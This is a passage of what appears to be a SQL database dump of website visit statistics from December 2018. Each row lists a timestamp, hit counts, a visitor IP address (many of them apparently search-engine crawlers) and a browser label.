1,0,0,'54.36.148.184','other'),(354631,1545130431,1,1,0,0,'54.36.148.111','other'),(354632,1545130908,1,1,0,0,'54.36.148.168','other'),(354633,1545130982,1,1,0,0,'8.29.198.26','other'),(354634,1545131044,1,1,0,0,'54.36.148.134','other'),(354635,1545131215,1,1,0,0,'54.36.148.187','other'),(354636,1545131308,1,1,0,0,'8.29.198.27','other'),(354637,1545131327,2,2,0,0,'46.229.168.152','other'),(354638,1545131382,1,1,0,0,'54.36.148.156','other'),(354639,1545131566,1,1,0,0,'95.163.255.97','other'),(354640,1545131569,1,1,0,0,'95.163.255.99','other'),(354641,1545131751,2,2,0,0,'5.9.70.113','other'),(354642,1545131840,1,1,0,0,'54.36.148.252','other'),(354643,1545132257,1,1,0,0,'95.163.255.96','other'),(354644,1545132261,1,1,0,0,'95.163.255.93','other'),(354645,1545132618,3,3,0,0,'178.154.244.11','other'),(354646,1545132675,3,3,0,0,'5.45.207.19','other'),(354647,1545132687,2,2,0,0,'141.8.142.103','other'),(354648,1545132713,2,2,0,0,'54.36.148.90','other'),(354649,1545132746,1,1,0,0,'46.229.168.149','other'),(354650,1545132846,1,1,0,0,'141.8.183.23','other'),(354651,1545132915,2,2,0,0,'5.45.207.79','other'),(354652,1545133102,1,1,0,0,'37.9.113.148','other'),(354653,1545133551,1,1,0,0,'54.36.148.149','other'),(354654,1545133848,1,1,0,0,'54.36.148.250','other'),(354655,1545133901,1,1,0,0,'95.163.255.94','other'),(354656,1545133904,1,1,0,0,'95.163.255.97','other'),(354657,1545133941,1,1,0,0,'66.249.66.195','chrome'),(354658,1545133942,1,1,0,0,'66.249.66.156','chrome'),(354659,1545133962,8,8,0,0,'5.45.207.79','other'),(354660,1545133974,6,6,0,0,'178.154.244.11','other'),(354661,1545134018,3,3,0,0,'5.45.207.19','other'),(354662,1545134035,1,1,0,0,'54.36.148.230','other'),(354663,1545134322,1,1,0,0,'37.9.113.148','other'),(354664,1545134559,1,1,0,0,'54.36.148.110','other'),(354665,1545134641,1,1,0,0,'66.249.66.40','chrome'),(354666,1545134871,2,2,0,0,'5.45.207.79','other'),(354667,1545134885,5,5,0,0,'178.154.244.11','other'),(354668,1545134890,1,1,0,0,'54.36.149.56','other'),(354669,1545134906,7,7,0,0,'176.106.5.30','chrome'),(354670,1545134982,2,2,0,0,'141.8.142.103','other'),(354671,1545135101,1,1,0,0,'37.115.204.75','chrome'),(354672,1545135248,1,1,0,0,'54.36.149.5','other'),(354673,1545135532,1,1,0,0,'46.229.168.138','other'),(354674,1545135591,1,1,0,0,'54.36.148.203','other'),(354675,1545135663,1,1,0,0,'5.45.207.19','other'),(354676,1545135697,1,1,0,0,'54.36.148.150','other'),(354677,1545135708,1,1,0,0,'46.98.251.66','chrome'),(354678,1545135729,1,1,0,0,'207.46.13.52','other'),(354679,1545135765,2,2,0,0,'91.196.178.182','chrome'),(354680,1545136114,1,1,0,0,'54.36.148.62','other'),(354681,1545136131,1,1,0,0,'141.8.142.103','other'),(354682,1545136173,1,1,0,0,'54.36.148.14','other'),(354683,1545136352,2,2,0,0,'178.154.244.11','other'),(354684,1545136638,1,1,0,0,'46.229.168.146','other'),(354685,1545136691,1,1,0,0,'178.251.111.12','chrome'),(354686,1545136766,1,1,0,0,'54.36.148.219','other'),(354687,1545136837,1,1,0,0,'66.249.66.195','chrome'),(354688,1545136838,1,1,0,0,'66.249.66.152','chrome'),(354689,1545136996,1,1,0,0,'66.249.66.156','chrome'),(354690,1545137085,2,2,0,0,'109.95.35.66','firefox'),(354691,1545137102,1,1,0,0,'54.36.148.16','other'),(354692,1545137224,1,1,0,0,'46.229.168.132','other'),(354693,1545138133,1,1,0,0,'66.249.66.156','chrome'),(354694,1545138170,1,1,0,0,'54.36.148.89','other'),(354695,1545138361,1,1,0,0,'46.229.168.130','other'),(354696,1545138946,1,1,0,0,'54.36.148.101','other'),(354697,1545139023,1,1,0,0,'207.46.13.104','other'),(354698,1545139266,1,1,0,0,'194.44.79.183','chrome'),(354699,1545139684,2,2,0,0,'91.196.179.25','firefox'),(354700,1545139792,1,1,0,0,'95.163.255.190','other'),(354701,1545139924,2,2,0,0,'94.178.107.70','firefox'),(354702,1545140011,2,2,0,0,'78.111.185.226','chrome'),(354703,1545140016,1,1,0,0,'157.55.39.162','other'),(354704,1545140107,2,2,0,0,'91.196.178.70','firefox'),(354705,1545140688,1,1,0,0,'54.36.149.39','other'),(354706,1545141267,2,2,0,0,'66.249.66.156','chrome'),(354707,1545141331,2,2,0,0,'91.196.178.67','chrome'),(354708,1545141545,1,1,0,0,'54.36.148.209','other'),(354709,1545141656,1,1,0,0,'54.36.148.121','other'),(354710,1545141821,2,2,0,0,'8.29.198.26','other'),(354711,1545141865,1,1,0,0,'95.132.41.14','chrome'),(354712,1545141910,1,1,0,0,'54.36.148.99','other'),(354713,1545141931,1,1,0,0,'46.229.168.146','other'),(354714,1545142011,1,1,0,0,'54.36.148.166','other'),(354715,1545142115,1,1,0,0,'54.36.148.226','other'),(354716,1545142163,1,1,0,0,'54.36.148.80','other'),(354717,1545142280,1,1,0,0,'54.36.149.55','other'),(354718,1545142337,2,2,0,0,'54.36.148.153','other'),(354719,1545142783,1,1,0,0,'95.163.255.94','other'),(354720,1545142785,1,1,0,0,'95.163.255.99','other'),(354721,1545142811,2,2,0,0,'40.77.167.60','other'),(354722,1545142857,1,1,0,0,'54.36.148.26','other'),(354723,1545142923,1,1,0,0,'54.36.148.199','other'),(354724,1545143058,1,1,0,0,'54.36.149.32','other'),(354725,1545143132,1,1,0,0,'54.36.149.103','other'),(354726,1545143280,1,1,0,0,'54.36.148.147','other'),(354727,1545143422,1,1,0,0,'91.196.179.138','chrome'),(354728,1545143953,1,1,0,0,'40.77.167.60','other'),(354729,1545144153,1,1,0,0,'54.36.149.44','other'),(354730,1545144231,1,1,0,0,'5.45.207.19','other'),(354731,1545144329,2,2,0,0,'141.8.142.103','other'),(354732,1545144359,2,2,0,0,'178.154.244.11','other'),(354733,1545144394,1,1,0,0,'54.36.148.74','other'),(354734,1545144657,1,1,0,0,'87.250.224.118','other'),(354735,1545144724,1,1,0,0,'66.249.66.154','chrome'),(354736,1545144823,1,1,0,0,'54.36.148.138','other'),(354737,1545144841,1,1,0,0,'37.9.113.20','other'),(354738,1545144843,1,1,0,0,'54.36.148.209','other'),(354739,1545144868,1,1,0,0,'178.154.200.48','other'),(354740,1545144944,1,1,0,0,'95.108.181.54','other'),(354741,1545145007,1,1,0,0,'54.36.148.29','other'),(354742,1545145075,1,1,0,0,'54.36.149.26','other'),(354743,1545145166,1,1,0,0,'54.36.148.255','other'),(354744,1545145292,1,1,0,0,'95.163.255.99','other'),(354745,1545145295,1,1,0,0,'95.163.255.95','other'),(354746,1545145303,1,1,0,0,'82.207.49.98','firefox'),(354747,1545145334,1,1,0,0,'5.255.253.38','other'),(354748,1545145336,1,1,0,0,'141.8.183.22','other'),(354749,1545145472,1,1,0,0,'54.36.149.30','other'),(354750,1545145509,1,1,0,0,'91.196.179.138','chrome'),(354751,1545145523,2,2,0,0,'178.95.246.220','chrome'),(354752,1545145524,1,1,0,0,'46.229.168.134','other'),(354753,1545145526,1,1,0,0,'46.229.168.148','other'),(354754,1545145615,1,1,0,0,'178.154.171.27','other'),(354755,1545146017,1,1,0,0,'178.92.220.139','chrome'),(354756,1545146022,1,1,0,0,'66.249.66.152','chrome'),(354757,1545146084,1,1,0,0,'213.180.203.40','other'),(354758,1545146145,3,3,0,0,'178.154.244.11','other'),(354759,1545146157,1,1,0,0,'46.229.168.138','other'),(354760,1545146177,1,1,0,0,'141.8.142.103','other'),(354761,1545146200,1,1,0,0,'5.45.207.19','other'),(354762,1545146242,1,1,0,0,'178.154.244.65','other'),(354763,1545146271,1,1,0,0,'95.108.181.75','other'),(354764,1545146398,1,1,0,0,'54.36.149.39','other'),(354765,1545146635,2,2,0,0,'91.196.178.78','firefox'),(354766,1545146763,1,1,0,0,'54.36.148.60','other'),(354767,1545147012,1,1,0,0,'54.36.149.100','other'),(354768,1545147157,1,1,0,0,'5.53.116.121','chrome'),(354769,1545147190,1,1,0,0,'54.36.149.42','other'),(354770,1545147319,1,1,0,0,'46.229.168.141','other'),(354771,1545147399,1,1,0,0,'54.36.148.234','other'),(354772,1545147406,1,1,0,0,'54.36.149.39','other'),(354773,1545147519,1,1,0,0,'54.36.148.27','other'),(354774,1545147603,1,1,0,0,'54.36.148.164','other'),(354775,1545147722,1,1,0,0,'54.36.148.223','other'),(354776,1545147840,1,1,0,0,'54.36.149.11','other'),(354777,1545148543,1,1,0,0,'188.165.255.126','other'),(354778,1545148625,1,1,0,0,'46.229.168.148','other'),(354779,1545148695,1,1,0,0,'54.36.149.105','other'),(354780,1545148835,1,1,0,0,'54.36.148.170','other'),(354781,1545148916,3,3,0,0,'141.8.142.103','other'),(354782,1545148930,2,2,0,0,'91.196.178.133','firefox'),(354783,1545148995,1,1,0,0,'66.249.66.154','chrome'),(354784,1545149062,1,1,0,0,'66.249.66.40','chrome'),(354785,1545149222,1,1,0,0,'46.133.154.96','chrome'),(354786,1545149251,2,2,0,0,'95.163.255.96','other'),(354787,1545149296,1,1,0,0,'178.154.244.11','other'),(354788,1545149353,1,1,0,0,'37.9.113.148','other'),(354789,1545149455,1,1,0,0,'46.166.137.201','other'),(354790,1545149592,1,1,0,0,'5.45.207.79','other'),(354791,1545149632,1,1,0,0,'54.36.148.55','other'),(354792,1545149737,2,2,0,0,'40.77.167.60','other'),(354793,1545150340,1,1,0,0,'95.108.213.4','other'),(354794,1545150974,1,1,0,0,'93.77.233.182','msie'),(354795,1545151270,1,1,0,0,'54.36.148.183','other'),(354796,1545151386,1,1,0,0,'46.229.168.137','other'),(354797,1545151616,1,1,0,0,'66.249.66.157','chrome'),(354798,1545151617,1,1,0,0,'66.249.66.152','chrome'),(354799,1545151722,1,1,0,0,'54.36.148.184','other'),(354800,1545151764,4,4,0,0,'207.46.13.52','other'),(354801,1545152435,1,1,0,0,'54.36.148.203','other'),(354802,1545152460,1,1,0,0,'5.45.207.79','other'),(354803,1545152559,1,1,0,0,'54.36.148.161','other'),(354804,1545152599,1,1,0,0,'93.77.233.182','opera'),(354805,1545152686,1,1,0,0,'8.29.198.25','other'),(354806,1545152692,1,1,0,0,'54.36.148.195','other'),(354807,1545152725,1,1,0,0,'54.36.148.231','other'),(354808,1545152798,1,1,0,0,'66.249.66.154','chrome'),(354809,1545153019,1,1,0,0,'8.29.198.26','other'),(354810,1545153026,1,1,0,0,'178.154.244.11','other'),(354811,1545153109,1,1,0,0,'157.55.39.233','other'),(354812,1545153237,1,1,0,0,'54.36.148.144','other'),(354813,1545153571,1,1,0,0,'54.36.148.73','other'),(354814,1545153874,1,1,0,0,'66.249.66.42','chrome'),(354815,1545153913,1,1,0,0,'54.36.149.48','other'),(354816,1545153933,1,1,0,0,'54.36.148.112','other'),(354817,1545153975,2,2,0,0,'77.88.207.114','opera'),(354818,1545154196,1,1,0,0,'54.36.148.205','other'),(354819,1545154239,1,1,0,0,'46.229.168.153','other'),(354820,1545154241,1,1,0,0,'46.229.168.151','other'),(354821,1545154346,1,1,0,0,'54.36.148.250','other'),(354822,1545154707,1,1,0,0,'54.36.149.7','other'),(354823,1545155473,1,1,0,0,'54.36.149.26','other'),(354824,1545155668,2,2,0,0,'66.249.66.152','chrome'),(354825,1545155678,1,1,0,0,'5.45.207.19','other'),(354826,1545155718,1,1,0,0,'95.108.213.4','other'),(354827,1545156283,1,1,0,0,'95.163.255.163','other'),(354828,1545156291,1,1,0,0,'95.163.255.182','other'),(354829,1545156486,1,1,0,0,'46.229.168.145','other'),(354830,1545156703,1,1,0,0,'54.36.148.109','other'),(354831,1545157131,1,1,0,0,'91.124.25.37','firefox'),(354832,1545157485,1,1,0,0,'5.45.207.19','other'),(354833,1545157693,1,1,0,0,'54.36.148.46','other'),(354834,1545157812,1,1,0,0,'54.36.148.132','other'),(354835,1545158003,1,1,0,0,'46.229.168.129','other'),(354836,1545158211,1,1,0,0,'37.9.113.103','other'),(354837,1545158236,2,2,0,0,'66.249.66.156','chrome'),(354838,1545158242,2,2,0,0,'66.249.66.154','chrome'),(354839,1545158370,2,2,0,0,'46.211.25.250','chrome'),(354840,1545158613,1,1,0,0,'5.45.207.79','other'),(354841,1545158640,1,1,0,0,'54.36.148.170','other'),(354842,1545158777,1,1,0,0,'46.229.168.142','other'),(354843,1545158980,1,1,0,0,'54.36.148.131','other'),(354844,1545158986,1,1,0,0,'40.77.167.129','other'),(354845,1545159195,1,1,0,0,'54.36.148.96','other'),(354846,1545159332,1,1,0,0,'54.36.148.34','other'),(354847,1545159911,1,1,0,0,'54.36.148.143','other'),(354848,1545159992,1,1,0,0,'207.46.13.165','other'),(354849,1545160063,1,1,0,0,'54.36.148.206','other'),(354850,1545160128,1,1,0,0,'46.229.168.141','other'),(354851,1545160130,1,1,0,0,'46.229.168.152','other'),(354852,1545160361,2,2,0,0,'66.249.66.152','chrome'),(354853,1545160374,1,1,0,0,'54.36.148.55','other'),(354854,1545160388,1,1,0,0,'66.249.66.156','chrome'),(354855,1545160495,1,1,0,0,'95.163.255.65','other'),(354856,1545160503,1,1,0,0,'95.163.255.69','other'),(354857,1545160776,1,1,0,0,'54.36.148.248','other'),(354858,1545160962,1,1,0,0,'157.55.39.135','other'),(354859,1545161108,1,1,0,0,'54.36.149.1','other'),(354860,1545161149,1,1,0,0,'95.163.255.66','other'),(354861,1545161151,1,1,0,0,'95.163.255.68','other'),(354862,1545161164,1,1,0,0,'40.77.167.40','other'),(354863,1545161378,1,1,0,0,'5.45.207.19','other'),(354864,1545161381,4,4,0,0,'178.154.244.11','other'),(354865,1545161562,1,1,0,0,'54.36.148.111','other'),(354866,1545161684,2,2,0,0,'95.108.213.4','other'),(354867,1545161787,5,5,0,0,'141.8.142.103','other'),(354868,1545161796,2,2,0,0,'5.45.207.79','other'),(354869,1545161959,1,1,0,0,'91.196.178.133','chrome'),(354870,1545162028,1,1,0,0,'95.163.255.92','other'),(354871,1545162033,1,1,0,0,'95.163.255.96','other'),(354872,1545162180,1,1,0,0,'66.249.66.152','chrome'),(354873,1545162190,1,1,0,0,'54.36.148.95','other'),(354874,1545162238,1,1,0,0,'54.36.148.121','other'),(354875,1545162276,1,1,0,0,'46.229.168.150','other'),(354876,1545162518,2,2,0,0,'5.45.207.19','other'),(354877,1545162672,1,1,0,0,'95.108.213.4','other'),(354878,1545162676,1,1,0,0,'54.36.149.104','other'),(354879,1545162683,1,1,0,0,'37.9.113.148','other'),(354880,1545162868,3,3,0,0,'5.45.207.79','other'),(354881,1545162927,4,4,0,0,'178.154.244.11','other'),(354882,1545163037,2,2,0,0,'46.211.25.250','chrome'),(354883,1545163052,2,2,0,0,'66.249.66.154','chrome'),(354884,1545163187,1,1,0,0,'54.36.148.85','other'),(354885,1545163312,1,1,0,0,'54.36.148.18','other'),(354886,1545163518,6,6,0,0,'5.45.207.19','other'),(354887,1545163532,1,1,0,0,'8.29.198.25','other'),(354888,1545163592,1,1,0,0,'5.188.210.3','chrome'),(354889,1545163627,1,1,0,0,'54.36.148.254','other'),(354890,1545163697,1,1,0,0,'87.250.224.47','other'),(354891,1545163862,1,1,0,0,'8.29.198.27','other'),(354892,1545163875,1,1,0,0,'178.154.244.11','other'),(354893,1545163930,1,1,0,0,'37.9.113.148','other'),(354894,1545163949,4,4,0,0,'5.45.207.79','other'),(354895,1545164021,1,1,0,0,'95.108.181.75','other'),(354896,1545164059,2,2,0,0,'91.196.178.171','chrome'),(354897,1545164064,2,2,0,0,'193.200.151.153','chrome'),(354898,1545164101,2,2,0,0,'37.9.113.103','other'),(354899,1545164136,1,1,0,0,'141.8.142.108','other'),(354900,1545164170,3,3,0,0,'95.108.213.4','other'),(354901,1545164202,6,6,0,0,'141.8.142.103','other'),(354902,1545164389,1,1,0,0,'54.36.148.62','other'),(354903,1545164556,1,1,0,0,'87.250.224.65','other'),(354904,1545164670,1,1,0,0,'54.36.148.229','other'),(354905,1545164902,1,1,0,0,'178.154.244.11','other'),(354906,1545165006,1,1,0,0,'54.36.149.45','other'),(354907,1545165130,1,1,0,0,'95.108.181.54','other'),(354908,1545165137,1,1,0,0,'5.45.207.19','other'),(354909,1545165178,1,1,0,0,'54.36.148.238','other'),(354910,1545165336,1,1,0,0,'54.36.149.19','other'),(354911,1545165465,1,1,0,0,'54.36.149.59','other'),(354912,1545165521,1,1,0,0,'193.200.151.153','chrome'),(354913,1545165659,2,2,0,0,'37.53.125.42','firefox'),(354914,1545165929,1,1,0,0,'66.249.66.154','chrome'),(354915,1545165976,1,1,0,0,'54.36.149.5','other'),(354916,1545166062,1,1,0,0,'95.163.255.94','other'),(354917,1545166064,1,1,0,0,'95.163.255.93','other'),(354918,1545166629,1,1,0,0,'54.36.148.175','other'),(354919,1545166731,1,1,0,0,'54.36.148.93','other'),(354920,1545166931,1,1,0,0,'46.229.168.143','other'),(354921,1545167019,1,1,0,0,'66.249.66.156','chrome'),(354922,1545167020,1,1,0,0,'66.249.66.152','chrome'),(354923,1545167197,1,1,0,0,'207.46.13.165','other'),(354924,1545167206,1,1,0,0,'54.36.148.181','other'),(354925,1545167269,2,2,0,0,'5.45.207.79','other'),(354926,1545167382,1,1,0,0,'141.8.142.103','other'),(354927,1545167415,2,2,0,0,'157.55.39.135','other'),(354928,1545167428,1,1,0,0,'54.36.148.198','other'),(354929,1545167479,1,1,0,0,'54.36.148.203','other'),(354930,1545167612,1,1,0,0,'65.132.59.34','other'),(354931,1545167701,1,1,0,0,'54.36.148.237','other'),(354932,1545167736,1,1,0,0,'54.36.148.75','other'),(354933,1545167828,1,1,0,0,'46.229.168.138','other'),(354934,1545168055,2,2,0,0,'37.53.125.42','firefox'),(354935,1545168121,1,1,0,0,'178.154.244.11','other'),(354936,1545168127,1,1,0,0,'5.45.207.19','other'),(354937,1545168221,1,1,0,0,'54.36.148.165','other'),(354938,1545168383,1,1,0,0,'54.36.148.214','other'),(354939,1545168459,1,1,0,0,'78.154.161.134','msie'),(354940,1545168533,1,1,0,0,'95.163.255.177','other'),(354941,1545168536,1,1,0,0,'95.163.255.158','other'),(354942,1545168579,1,1,0,0,'65.132.59.34','other'),(354943,1545168611,1,1,0,0,'66.249.66.157','chrome'),(354945,1545168947,1,1,0,0,'54.36.148.194','other'),(354946,1545169139,1,1,0,0,'178.154.244.11','other'),(354947,1545169188,1,1,0,0,'46.229.168.130','other'),(354948,1545169189,1,1,0,0,'46.229.168.150','other'),(354949,1545169201,1,1,0,0,'54.36.149.40','other'),(354950,1545169281,1,1,0,0,'91.196.178.132','chrome'),(354951,1545169357,1,1,0,0,'54.36.148.104','other'),(354952,1545169736,1,1,0,0,'5.45.207.8','other'),(354953,1545169783,1,1,0,0,'141.8.183.23','other'),(354954,1545169960,1,1,0,0,'54.36.149.43','other'),(354955,1545170013,1,1,0,0,'66.249.66.42','chrome'),(354956,1545170096,1,1,0,0,'87.250.224.65','other'),(354957,1545170315,1,1,0,0,'46.229.168.144','other'),(354958,1545170467,1,1,0,0,'5.45.207.79','other'),(354959,1545170512,1,1,0,0,'54.36.148.218','other'),(354960,1545170650,7,7,0,0,'207.46.13.165','other'),(354961,1545170703,4,4,0,0,'157.55.39.135','other'),(354962,1545170809,3,3,0,0,'40.77.167.40','other'),(354963,1545170891,3,3,0,0,'66.249.66.156','chrome'),(354964,1545170926,1,1,0,0,'54.36.148.172','other'),(354965,1545171080,1,1,0,0,'46.229.168.152','other'),(354966,1545171255,1,1,0,0,'66.249.66.152','chrome'),(354967,1545171408,1,1,0,0,'91.196.178.132','chrome'),(354968,1545171712,2,2,0,0,'52.53.201.78','chrome'),(354969,1545171762,1,1,0,0,'46.229.168.151','other'),(354970,1545171764,1,1,0,0,'46.229.168.138','other'),(354971,1545172631,1,1,0,0,'54.36.148.108','other'),(354972,1545172773,1,1,0,0,'46.229.168.153','other'),(354973,1545173134,1,1,0,0,'66.249.66.154','chrome'),(354974,1545173198,1,1,0,0,'54.36.148.87','other'),(354975,1545173425,1,1,0,0,'95.163.255.92','other'),(354976,1545173430,1,1,0,0,'95.163.255.99','other'),(354977,1545173706,1,1,0,0,'157.55.39.70','other'),(354978,1545173877,1,1,0,0,'66.249.66.40','chrome'),(354979,1545173944,21,21,0,0,'94.179.60.187','msie'),(354980,1545174123,2,2,0,0,'5.45.207.79','other'),(354982,1545174171,1,1,0,0,'46.229.168.135','other'),(354983,1545174170,1,1,0,0,'196.247.18.140','chrome'),(354984,1545174232,1,1,0,0,'178.154.244.11','other'),(354985,1545174284,1,1,0,0,'66.249.66.157','chrome'),(354986,1545174374,1,1,0,0,'8.29.198.27','other'),(354987,1545174693,1,1,0,0,'8.29.198.26','other'),(354988,1545174750,4,4,0,0,'5.45.207.19','other'),(354989,1545174860,1,1,0,0,'46.229.168.141','other'),(354990,1545175113,1,1,0,0,'66.249.66.156','chrome'),(354991,1545175193,1,1,0,0,'95.163.255.176','other'),(354992,1545175197,1,1,0,0,'95.163.255.183','other'),(354993,1545175309,1,1,0,0,'54.36.148.122','other'),(354994,1545175341,2,2,0,0,'87.250.224.47','other'),(354995,1545175355,8,8,0,0,'5.45.207.79','other'),(354996,1545175512,7,7,0,0,'178.154.244.11','other'),(354997,1545175668,2,2,0,0,'95.108.213.4','other'),(354998,1545175906,6,6,0,0,'5.45.207.19','other'),(354999,1545176011,3,3,0,0,'141.8.142.103','other'),(355000,1545176123,2,2,0,0,'66.249.66.152','chrome'),(355001,1545176371,1,1,0,0,'87.250.224.65','other'),(355002,1545176433,1,1,0,0,'5.45.207.79','other'),(355003,1545176557,2,2,0,0,'95.213.141.126','opera'),(355004,1545176645,6,6,0,0,'178.154.244.11','other'),(355005,1545176684,1,1,0,0,'31.184.238.34','chrome'),(355006,1545176772,1,1,0,0,'37.9.113.20','other'),(355007,1545176833,2,2,0,0,'95.108.213.4','other'),(355008,1545176867,1,1,0,0,'54.36.148.71','other'),(355009,1545176985,5,5,0,0,'5.45.207.19','other'),(355010,1545176986,3,3,0,0,'141.8.142.103','other'),(355011,1545177119,1,1,0,0,'54.36.148.211','other'),(355012,1545177252,3,3,0,0,'66.249.66.154','chrome'),(355013,1545177344,1,1,0,0,'54.36.148.113','other'),(355014,1545177347,5,5,0,0,'5.45.207.79','other'),(355015,1545177455,1,1,0,0,'54.36.148.162','other'),(355016,1545177588,1,1,0,0,'178.154.244.11','other'),(355017,1545177641,1,1,0,0,'207.46.13.88','other'),(355018,1545177654,1,1,0,0,'87.250.224.65','other'),(355019,1545177825,1,1,0,0,'66.249.66.42','chrome'),(355020,1545177835,2,2,0,0,'87.250.224.47','other'),(355021,1545177865,1,1,0,0,'37.9.113.148','other'),(355022,1545177887,3,3,0,0,'66.249.66.152','chrome'),(355023,1545177891,3,3,0,0,'5.45.207.19','other'),(355024,1545177945,2,2,0,0,'66.249.66.155','chrome'),(355025,1545178175,5,5,0,0,'141.8.142.103','other'),(355026,1545178457,1,1,0,0,'5.45.207.79','other'),(355027,1545178473,1,1,0,0,'46.229.168.129','other'),(355028,1545178564,1,1,0,0,'207.46.13.88','other'),(355029,1545178585,2,2,0,0,'178.154.244.11','other'),(355030,1545178670,1,1,0,0,'46.229.168.138','other'),(355031,1545178671,1,1,0,0,'46.229.168.130','other'),(355032,1545178904,1,1,0,0,'54.36.148.200','other'),(355033,1545178983,2,2,0,0,'95.163.255.92','other'),(355034,1545178984,1,1,0,0,'95.163.255.93','other'),(355035,1545178987,1,1,0,0,'95.163.255.98','other'),(355036,1545179190,1,1,0,0,'40.77.169.26','other'),(355037,1545179393,1,1,0,0,'13.57.233.99','chrome'),(355038,1545179644,1,0,1,0,'66.249.66.57',''),(355039,1545179645,1,0,1,0,'66.249.66.42',''),(355040,1545180026,1,1,0,0,'54.36.149.39','other'),(355041,1545180094,1,1,0,0,'54.36.148.35','other'),(355042,1545180419,1,1,0,0,'46.229.168.132','other'),(355043,1545180602,1,1,0,0,'54.36.148.47','other'),(355044,1545180916,1,1,0,0,'46.229.168.141','other'),(355045,1545180985,1,1,0,0,'13.66.139.0','other'),(355046,1545181109,1,1,0,0,'185.220.102.6','other'),(355047,1545181122,1,1,0,0,'46.166.129.156','other'),(355048,1545181284,1,1,0,0,'46.229.168.153','other'),(355049,1545181737,1,1,0,0,'54.36.148.242','other'),(355050,1545182105,1,1,0,0,'54.36.149.54','other'),(355051,1545182565,1,1,0,0,'54.36.149.76','other'),(355052,1545182625,1,1,0,0,'209.17.96.50','other'),(355053,1545182758,1,1,0,0,'95.163.255.171','other'),(355054,1545182760,1,1,0,0,'95.163.255.190','other'),(355055,1545183003,1,1,0,0,'54.36.148.112','other'),(355056,1545183019,1,1,0,0,'95.163.255.108','other'),(355057,1545183045,1,1,0,0,'95.163.255.103','other'),(355058,1545183817,1,1,0,0,'5.45.207.19','other'),(355059,1545184039,1,1,0,0,'46.229.168.143','other'),(355060,1545184041,1,1,0,0,'46.229.168.141','other'),(355061,1545184064,3,3,0,0,'178.154.244.11','other'),(355062,1545184067,1,1,0,0,'87.250.224.65','other'),(355063,1545184129,1,1,0,0,'54.36.149.37','other'),(355064,1545184229,1,1,0,0,'54.36.148.245','other'),(355065,1545184335,1,1,0,0,'95.108.213.4','other'),(355066,1545184481,1,1,0,0,'95.163.255.97','other'),(355067,1545184484,2,2,0,0,'95.163.255.93','other'),(355068,1545184531,1,1,0,0,'54.36.148.159','other'),(355069,1545184570,1,1,0,0,'95.163.255.92','other'),(355070,1545184661,1,1,0,0,'95.163.255.155','other'),(355071,1545184839,1,1,0,0,'66.249.66.57','chrome'),(355072,1545184840,1,1,0,0,'66.249.66.42','chrome'),(355073,1545184845,1,1,0,0,'54.36.148.92','other'),(355074,1545184892,1,1,0,0,'87.250.224.47','other'),(355075,1545184930,1,1,0,0,'54.36.148.188','other'),(355076,1545184972,1,1,0,0,'54.36.148.150','other'),(355077,1545185215,1,1,0,0,'8.29.198.27','other'),(355078,1545185363,1,1,0,0,'157.55.39.122','other'),(355079,1545185530,1,1,0,0,'8.29.198.25','other'),(355080,1545185583,1,1,0,0,'5.45.207.79','other'),(355081,1545185877,1,1,0,0,'54.36.149.40','other'),(355082,1545186017,2,2,0,0,'178.154.244.11','other'),(355083,1545186134,1,1,0,0,'5.45.207.19','other'),(355084,1545186287,1,1,0,0,'157.55.39.122','other'),(355085,1545186824,1,1,0,0,'54.36.148.209','other'),(355086,1545187024,1,1,0,0,'66.249.66.156','chrome'),(355087,1545187025,1,1,0,0,'66.249.66.152','chrome'),(355088,1545187052,1,1,0,0,'54.36.148.157','other'),(355089,1545187152,2,2,0,0,'178.154.244.11','other'),(355090,1545187574,1,1,0,0,'157.55.39.189','other'),(355091,1545187747,1,1,0,0,'54.36.149.5','other'),(355092,1545188117,1,1,0,0,'54.36.148.181','other'),(355093,1545188232,1,1,0,0,'66.249.66.156','chrome'),(355094,1545188291,1,1,0,0,'54.36.148.114','other'),(355095,1545188364,1,1,0,0,'54.36.149.85','other'),(355096,1545189033,1,1,0,0,'46.229.168.154','other'),(355097,1545189279,1,1,0,0,'66.249.66.61','chrome'),(355098,1545189280,1,1,0,0,'66.249.66.40','chrome'),(355099,1545189367,1,1,0,0,'66.249.66.44','chrome'),(355100,1545189698,186,186,0,0,'95.91.13.10','other'),(355101,1545189758,1,1,0,0,'54.36.148.87','other'),(355102,1545189788,1,1,0,0,'46.229.168.142','other'),(355103,1545190131,1,1,0,0,'54.36.148.172','other'),(355104,1545190329,1,1,0,0,'46.229.168.137','other'),(355105,1545190387,1,1,0,0,'46.229.168.140','other'),(355106,1545190682,100,100,0,0,'213.239.216.194','other'),(355107,1545190952,1,1,0,0,'54.36.149.94','other'),(355108,1545191126,6,6,0,0,'5.45.207.79','other'),(355109,1545191266,2,2,0,0,'87.250.224.65','other'),(355110,1545191311,2,2,0,0,'95.108.213.4','other'),(355111,1545191512,1,1,0,0,'46.229.168.154','other'),(355112,1545191514,1,1,0,0,'46.229.168.148','other'),(355113,1545191530,4,4,0,0,'5.45.207.19','other'),(355114,1545191581,6,6,0,0,'178.154.244.11','other'),(355115,1545191714,1,1,0,0,'141.8.142.103','other'),(355116,1545191962,1,1,0,0,'54.36.148.107','other'),(355117,1545192138,2,2,0,0,'5.45.207.79','other'),(355118,1545192283,1,1,0,0,'66.249.66.44','chrome'),(355119,1545192426,2,2,0,0,'66.249.66.156','chrome'),(355120,1545192618,6,6,0,0,'178.154.244.11','other'),(355121,1545192926,3,3,0,0,'5.45.207.19','other'),(355122,1545192973,1,1,0,0,'141.8.142.103','other'),(355123,1545192995,1,1,0,0,'46.229.168.151','other'),(355124,1545193040,1,1,0,0,'54.36.148.15','other'),(355125,1545193561,1,1,0,0,'180.76.15.26','other'),(355126,1545193562,1,1,0,0,'180.76.15.20','other'),(355127,1545193679,1,1,0,0,'5.35.37.50','chrome'),(355128,1545193727,1,1,0,0,'54.36.148.206','other'),(355129,1545193755,1,1,0,0,'157.55.39.188','other'),(355130,1545194218,1,1,0,0,'54.36.148.48','other'),(355131,1545194484,1,1,0,0,'54.36.148.221','other'),(355132,1545194641,1,1,0,0,'46.229.168.132','other'),(355133,1545195327,1,1,0,0,'46.166.186.193','other'),(355134,1545195531,2,2,0,0,'66.249.66.152','chrome'),(355135,1545195625,2,2,0,0,'157.55.39.123','other'),(355136,1545195662,2,2,0,0,'95.163.255.98','other'),(355137,1545195665,1,1,0,0,'95.163.255.96','other'),(355138,1545195778,1,1,0,0,'95.163.255.93','other'),(355139,1545195782,2,2,0,0,'95.163.255.92','other'),(355140,1545196006,1,1,0,0,'46.229.168.137','other'),(355141,1545196062,2,2,0,0,'8.29.198.25','other'),(355142,1545196501,1,1,0,0,'54.36.149.40','other'),(355143,1545196596,1